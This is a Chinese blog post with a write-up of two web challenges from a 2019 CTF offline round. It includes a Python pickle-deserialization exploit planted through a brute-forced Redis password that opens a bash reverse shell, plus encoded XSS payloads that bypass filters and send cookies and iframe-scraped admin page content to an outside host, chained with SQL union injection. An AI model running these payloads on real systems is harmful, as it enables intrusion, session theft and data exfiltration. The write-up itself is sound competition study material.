菠萝吹雪's Studio.

[Untitled Post]

字数统计: 1.5k阅读时长: 7 min
2019/07/09 Share

#2019国赛华东北赛区线下2道web题wp

###前言
最近考试结束,开始复现国赛线下没做出来的题目,师傅们tql

####1.vegetable
hctf2018原题warmup

####2.cookie
hint是redis弱口令你知道pickle吗?
题目一开始是一个用户名登录界面

注册用户后登进去是一个flag领取系统界面
1.png-29.8kB

只有一个修改个人资料的功能可以用
2.png-80.7kB

既然是redis,用nmap扫了一波端口,redis默认端口在6379
3.png-9.1kB

提示弱口令,之前有收集的爆破redis弱口令的脚本,爆破了一波没有成功,用msf里爆破redis弱口令的模块,成功爆出密码是chocolate
4.png-203.1kB

既然拿到了redis,下一步开始考虑如何getshell,正常的思路应该是尝试在www目录下写小马或者在/root/.ssh下写私钥如何ssh登录,但是必须有访问root目录的权限,可惜这两个方案都不行
5.png-70.5kB

转到另一个hint pickle,应该用pickle反序列化弹shell,但是如何利用没有想到思路
登录redis的时候,尝试读了一下keys,发现key的名字和cookie是一样的,并且key值是被序列化过的,
6.png-404.6kB

于是这样就和pickle联系起来了,题目应该是登陆的时候用了pickle来序列化用户名密码,如果把key值改成序列化过弹shell的代码,再次登陆,会触发反序列化的点,反弹shell
7.png-108.3kB

自己写的exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# -*- coding: utf-8 -*-
import os
import pickle
import redis

class payload(object):
def __reduce__(self):
return (os.system,('bash -i >& /dev/tcp/***.*.***.*/7777 0<&1',))

if __name__=="__main__":
a=payload();
b=pickle.dumps(a);
print (b)
pool = redis.ConnectionPool(host='**.***.**.***', port=6379, password='chocolate', db=0)
r = redis.Redis(connection_pool=pool)
cookie = '4444444444f922c94de3056c70e88ad225a4d61de5'
r.set(cookie,b)

成功反弹,(这里的坑点,win下的序列化和linux下的序列化值不一致,导致一直没弹回shell)
9.png-33.9kB

####3. babyxss
题目界面是模仿先知的页面,有投稿,反馈,思路一般是投稿处写xss打管理cookie
10.png-124.8kB

接下来就是fuzz了,发现过滤了(),\,//,\\,',=,src,'',以及它们的url编码,并且还开启了csp,开了unsafe-evalunsafe-inline,想到用String.fromCharCode绕过,并且实体编码没被过滤,用<svg>尝试

1
<svg><script>eval&#40String.fromCharCode&#40 97,108,101,114,116,40,120,115,115,41&#41&#41;</script>

成功。
接下来尝试获取管理的cookie
构造payload

1
<svg><script>eval&#40String.fromCharCode&#40 119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,104,114,101,102,61,104,116,116,112,58,47,47,105,112,46,112,111,114,116,63,99,61,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101&#41&#41;</script>

管理cookie没有弹成功,但是确实能弹回自己cookie
换一种思路,发现了admin.php
利用iframe进行跨域读取文件内容,利用onload+setInterval把页面内容循环打印出来

1
var iframe=document.createElement("iframe");iframe.src="/admin.php?id=-1 union select 1,2,flagg from flag";document.body.appendChild(iframe);iframe.onload=setInterval(function(){var c=encodeURI(document.getElementsByTagName("iframe")[0].contentWindow.document.getElementsByTagName("body")[0].innerHTML);window.location.href="http://"ip.port"?c="+c},1000);

获取到admin.php的内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
<head>
<meta charset="UTF-8">
<title>文章精选</title>
<link href="/static/css/main.css" rel="stylesheet">
<link href="https://cdn.bootcss.com/twitter-bootstrap/3.3.6/css/bootstrap.min.css" rel="stylesheet">
</head>
<body>
<div class="container">
<div class="header clearfix">
<nav>
<ul class="nav nav-pills pull-right">
<li role="presentation"><a href="/">主页</a></li>
<li role="presentation"><a href="post.php">投稿</a></li>
<li role="presentation"><a href="commitbug.php">反馈</a></li>
<li role="presentation"><a href="about.php">关于我</a></li>
</ul>
</nav>
<h3 class="text-muted">文章精选</h3>
</div>

<form method="GET" role="form">

<div class="form-group">
<label>请输入要查询用户的id</label>
<div class="input-group">
<div class="input-group-addon">用户ID</div>
<input class="form-control" type="text" name="id" placeholder="请输入ID。">
</div>
</div>

<button type="submit" class="btn btn-default">查询</button>
</form><br>
</div>
<script src="/static/js/jquery.min.js"></script>
<script src="/static/js/bootstrap.js"></script>
<script src="/static/js/main.js"></script>

</body>

看到有个查询的功能,应该要进行注入,继续利用xss进行注入,回弹结果。
没有进行任何的过滤,直接union注入得到flag
最后的payload

1
<svg><script>eval&#40String.fromCharCode&#40 118,97,114,32,105,102,114,97,109,101,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,105,102,114,97,109,101,46,115,114,99,61,34,47,97,100,109,105,110,46,112,104,112,63,105,100,61,45,49,32,117,110,105,111,110,32,115,101,108,101,99,116,32,49,44,50,44,102,108,97,103,103,32,102,114,111,109,32,102,108,97,103,34,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,105,102,114,97,109,101,41,59,105,102,114,97,109,101,46,111,110,108,111,97,100,61,115,101,116,73,110,116,101,114,118,97,108,40,102,117,110,99,116,105,111,110,40,41,123,118,97,114,32,99,61,101,110,99,111,100,101,85,82,73,40,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,105,102,114,97,109,101,34,41,91,48,93,46,99,111,110,116,101,110,116,87,105,110,100,111,119,46,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,98,111,100,121,34,41,91,48,93,46,105,110,110,101,114,72,84,77,76,41,59,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,104,114,101,102,61,34,104,116,116,112,58,47,47,34,105,112,46,112,111,114,116,34,63,99,61,34,43,99,125,44,49,48,48,48,41,59&#41&#41;</script>

QQ图片20190707171540.png-51kB

###后记
继续滚去学习了

CATALOG